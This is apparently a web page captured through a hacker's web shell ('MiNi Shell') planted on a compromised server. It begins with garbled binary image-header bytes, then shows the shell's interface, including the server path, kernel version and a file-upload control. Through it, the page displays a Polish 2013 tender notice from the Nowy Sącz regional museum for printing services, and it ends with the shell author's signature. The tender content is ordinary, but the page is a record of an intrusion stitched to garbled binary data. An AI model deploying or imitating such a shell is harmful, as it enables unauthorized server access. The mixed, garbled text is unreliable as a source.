JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/57896-N-2013.html

<p class="kh_header"><b>Nowy Sącz: Przetarg nieograniczony na dostawę do  Muzeum Okręgowego w Nowym Sączu druków takich jak zaproszenia, plakaty, ulotki, pocztówki i inne temu podobne druki</b><br>
<b>Numer ogłoszenia: 57896 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Okręgowe w Nowym Sączu , ul. Lwowska 3, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4437708, faks 018 4437865.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury Województwa Małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę do  Muzeum Okręgowego w Nowym Sączu druków takich jak zaproszenia, plakaty, ulotki, pocztówki i inne temu podobne druki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa druków wytworzonych przez Wykonawcę w postaci zaproszeń, plakatów, ulotek, pocztówek i innych temu podobnych, i dostarczenie do siedziby Zamawiającego tj. Muzeum Okręgowego w Nowym Sączu. Przedmiot umowy - dostawa wydawnictw jest rozumiana jako wykonanie - wytworzenie przez Wykonawcę w produkcji poligraficznej druku własnymi maszynami drukarskimi, komponentami; tuszem, farbą i na jego papierze itp., treści przekazanych przez Zamawiającego w pakiecie zawierającym zestaw niezbędnych elementów koniecznych do wykonania druku, a także według innych wymogów Zamawiającego określonych w specyfikacji lub umowie. Szczegółowy opis przedmiotu zamówienia ujęty jest w załączniku nr 5 do niniejszego SIWZ.
2.Zamówienie obejmuje dostawę druków realizowanych na bieżące potrzeby Zamawiającego; wymienione są w one w Szczegółowym opisie przedmiotu zamówienia z uwzględnieniem wymagań ilościowych i parametrów  technicznych -  ujęte w załączniku nr 5 do niniejszego SIWZ.  
3.Druki wykonane z ramach dostawy, zrealizowanej przez Wykonawcę muszą spełniać wymagania określone w specyfikacji oraz przyjętym standardom drukarskim, tak by druki wykonane w ramach dostawy zrealizowanej przez Wykonawcę spełniały następujące parametry odnośnie jakości  wykonania: 
a) czystość i ostrość rastra i kolorów; 
b) równomierność zadruku na dużych fragmentach jednolitego koloru;
c)dokładność spasowania matryc poszczególnych kolorów CMYK (zestaw czterech podstawowych kolorów farb drukarskich stosowanych powszechnie w druku kolorowym w poligrafii i metodach pokrewnych); 
d) prawidłową jakość aplikacji lakierów i folii;
e) dokładność felcowania/bigowania;
f) prawidłową jakość i estetykę cięcia do formatu i oprawy introligatorskiej 
5. Realizacja dostawy odbywać się będzie sukcesywnie w oparciu o zapotrzebowania Zamawiającego, na podstawie pisemnych zleceń obejmujących wykonanie konkretnych dostaw zwanych dalej zleceniem, po dostarczeniu przez Zamawiającego pakietu zawierającego zestaw niezbędnych elementów, koniecznych do wykonania druku m.in.:
1) tekst w formie zapisu cyfrowego lub maszynowego na papierze,
2) materiał ilustracyjny w postaci pozytywów lub w formie zapisu cyfrowego  innych informacji określonych szczegółowo w umowie, której wzór stanowi złącznik nr 3 do SIWZ.
6. Zamawiający ustala, iż w zależności od rodzaju zlecenia realizacja dostaw wraz z dostarczeniem Zamawiającemu ma być wykonana w terminie; 
1)2 dni od momentu przekazania zlecenia oraz pakietu do realizacji w zakresie wykonania plakatów, zaproszeń, ulotek, kartek okolicznościowych, pocztówek; 
2)5 dni od momentu przekazania zlecenia oraz pakietu do realizacji w zakresie wykonania folderów, informatorów i innych; 
3)Do czasu wykonania wymienionych w ust. 6 pozycji 1-2 wliczony jest czas 2 korekt. 
a)korekty dot. poz. 1 dokonane będą niezwłocznie po dostarczeniu projektu do siedziby Zamawiającego i w tym samym dniu przekazane Wykonawcy,
b)każda z 2 korekt dot. poz. 2 dokonana będzie w ciągu 1 dnia. Jeżeli korekta nie zostanie wykonana w ciągu 
1 dnia, to okres wykonania przedłuża się o czas wykonywania korekty przez Zamawiającego.
4)Odbiór materiałów po korektach odbywa się w siedzibie Zamawiającego. 
7.Do czasu dostawy wliczony jest czas potrzebny Wykonawcy na wszystkie czynności dla wykonania zamówienia, 
w tym także między innymi; samego druku, doręczeń materiałów do korekt, odbiór materiałów po korektach, dostawa wykonanych druków i czas potrzebny Zamawiającemu do dokonania akceptacji projektu i 2 korekt wydruków próbnych tych druków. Czas dokonania przez Zamawiającego korekt wydruków próbnych tych druków określony jest w umowie, której wzór stanowi złącznik nr 3 do SIWZ. 
8.Pakiety zawierające zestaw niezbędnych elementów, koniecznych do wykonania druku będą przekazywane 
w formie elektronicznej: na płycie CD/DVD, FTP, e-mailem lub w formie papierowej - każdorazowo w siedzibie Zamawiającego  wraz z pisemnym zleceniem. Zamawiający z co najmniej dwudniowym wyprzedzeniem zawiadamia Wykonawcę faksem o zleceniu i terminie odbioru zlecenia i materiałów w siedzibie Zamawiającego. Wszystkie uzgodnienia odnośnie realizacji zamówienia odbywać się będą w siedzibie Zamawiającego.
9.Zamówienie obejmuje także koszt odbioru zlecenia i pakietu zawierającego przedmiot zlecenia od Zamawiającego oraz dostawy wykonanych prac do siedziby zamawiającego: Nowy Sącz ul. Lwowska 3 lub inny adres w Nowym Sączu wskazany przez Zamawiającego.
10.Wykonawca zobowiązany jest wykonać przedmiot zamówienia z materiałów własnych (tj. papier, farba, komponenty) z użyciem własnych maszyn drukarskich.
11.W ramach zamówienia Wykonawca wykona ponadto:
1)przepisywanie tekstu (przypadku złożenia w pakiecie tekstu w formie papierowej);
2)obróbkę elektroniczna zdjęć; 
3)projekt graficzny do akceptacji  przez Zamawiającego;
4)skład komputerowy całości materiału; 
5)wydruk próbny;
6)dokona poprawek po 2 korektach dokonanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dopuszcza się zamówienia uzupełniające stanowiące nie więcej niż 20% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 7 ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.10.00.00-1, 22.14.00.00-3, 22.15.00.00-6, 22.31.00.00-6, 22.90.00.00-9, 22.85.20.00-7, 22.45.80.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie  wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1)spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące posiadania wiedzy i doświadczenia oraz
2)nie podlegają wykluczeniu na podstawie art. 24 ustawy 
2.W zakresie warunku wskazanego w ust. 1 pkt.1) Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże wykonanie dwóch dostaw druku o wartości nie niższej niż 55 000 zł brutto każda w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie (referencje). 
3. W zakresie warunku wskazanego w ust. 1 pkt.2) pod uwagę będą brane oferty Wykonawców:
1)którzy w ciągu ostatnich 3 lat przed wszczęciem postępowania nie wyrządzili szkody o której mowa w art. 24 ust.1 pkt. 1 ustawy;
2)w stosunku do których nie otwarto likwidacji lub do których upadłość ogłoszono, z wyjątkiem Wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego (art. 24 ust.1 pkt. 2) ustawy);
3)nie zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu (art. 24 ust.1 pkt. 3) ustawy);
4)nie karanych za przestępstwa w zakresie określonym w art. 24 ust. 1 pkt. 4)-8) ustawy, a także wobec których sąd nie orzekł nakazu o którym mowa w art. 24 ust. 1 pkt. 9) ustawy. 
4.Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5.W zakresie spełnienia określonych warunków ocena ich spełnienia nastąpi na podstawie przedstawionych przez Wykonawcę oświadczeń, dokumentów i próbek, o których mowa w Rozdziale VI.
6.Ocena spełnienia powyższych warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia 
w oparciu o informacje zawarte w dokumentach i oświadczeniach na podstawie przedłożonych dokumentów.
7.Zamawiający dokona sprawdzenia spełnienia przez Wykonawców wymogów określonych w ustawie 
i specyfikacji w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające:
1)komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją;
2)wyłącznie prawdziwe informacje mające wpływ na wynik prowadzonego postępowania
3)oraz oferty Wykonawców, którzy nie wykonywali czynności związanych z przygotowaniem prowadzonego postępowania i nie posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności.
8.Zamawiający wzywa Wykonawców w razie zaistnienia przesłanek ustawowych do złożenia określonych oświadczeń lub dokumentów, a także może zażądać w wyznaczonym przez siebie terminie uzupełnienia lub złożenia wyjaśnień dotyczących treści oferty lub dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego każdy 
z Wykonawców ma obowiązek przedłożyć wraz z ofertą próbki bezpłatne:
1)  wykonanych dotychczas przez Wykonawcę przykładowych druków - prac, przynajmniej po jednym egzemplarzu z każdych z wymienionych poniżej rodzajów wydawnictwa, a to
a) zaproszenie,
b) plakat,
c) kartka okolicznościowa.
Każdy wymieniony wyżej rodzaj wydawnictwa musi spełnić następujące warunki: nadruk offsetowy, kolor: 4+4;
-zaproszenie (pkt. a): papier powlekany dwukrotnie, dwustronnie; 3 próbki: kreda mat. od 150 gm2, kreda błysk. od 150 gm2 , kreda mat. z folią błysk od 150 gm2;
- dla plakatu (pkt. b): papier półkreda mat. od 135gm2;
-dla kartki okolicznościowej (pkt. c): 3 próbki papieru ozdobnego od 300g m2 z zastosowaniem 3 różnych uszlachetnień do wyboru: tłoczenie lub folia błysk lub lakier wybiórczy lub złocenie lub wycinanie laserowe;
Do każdej próbki powinna być załączona informacja o typie, gramaturze papieru i rodzaju zastosowanych uszlachetnień.

2)papieru z określeniem nazwy, rodzaju i gramatury, na których będą drukowane poszczególne pozycje druków wymienione w szczegółowym opisie przedmiotu zamówienia tj. w zał. nr 5.
UWAGA! Zamawiający nie zwraca bezpłatnych próbek o których mowa powyżej Wykonawcy którego oferta została wybrana.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach jak we wzorcu umowy stanowiącym załącznik nr 3 do niniejszej specyfikacji. 
2.Złożenie oferty jest równoznaczne z akceptacją treści umowy. 
3.Zamawiający przewiduje możliwość dokonania zmiany umowy w zakresie istotnych elementów na warunkach określonych niżej.  
4.W razie zaistnienia warunków określonych w specyfikacji i ustawie zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności takiej zmiany. Zamawiający lub Wykonawca może złożyć  pisemny wniosek do drugiej strony, zawierający projekt aneksu wraz z dołączonym opisem zmiany i jej uzasadnieniem. 
5.Zamawiający mimo, że przewiduje możliwość zmiany, w żadnym przypadku nie zobowiązuje się do wyrażenia takiej zgody na zmianę, za wyjątkiem zmian wynikłych ze zmiany stawek podatku od towarów i usług - VAT, kiedy w razie zmiany podatku - na wniosek drugiej strony - nowa stawka podatku zmienia stawkę dotychczasową na nową. 
6.Zmiana istotnych elementów umowy, może dotyczyć w szczególności zmiany zakresu rzeczowego, w tym określonych etapów - rodzajów zamówienia, rezygnacji z realizacji w całości lub w części etapów - rodzajów druków wydawniczych wymienionych w ofercie Wykonawcy, wynagrodzenia, terminu lub sposobu wykonania umowy i może nastąpić pod warunkiem wystąpienia zaistnienia jednej z okoliczności określonych w specyfikacji, a w szczególności: 
- zmiany stawki podatku VAT -  w razie zmiany podatku strony wyrażają zgodę na nową stawkę podatku VAT liczoną od dnia zmiany przepisów w tym zakresie. Ze względów porządkowych strony dokonają zmiany umowy 
w formie aneksu,
- zmniejszenie środków finansowych Zamawiającego.
7.   Strony ustalają, że w razie zmniejszenia dostawy tj. nakładu czy rezygnacji przez Zamawiającego z realizacji pozycji druku wynagrodzenie ulega proporcjonalnemu zmniejszeniu. Wykonawca otrzyma wynagrodzenie za faktyczną ilość dostarczonych druków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Okregowe
ul.Lwowska 3
33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 08:30, miejsce: Muzeum Okregowe
ul.Lwowska 3
33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com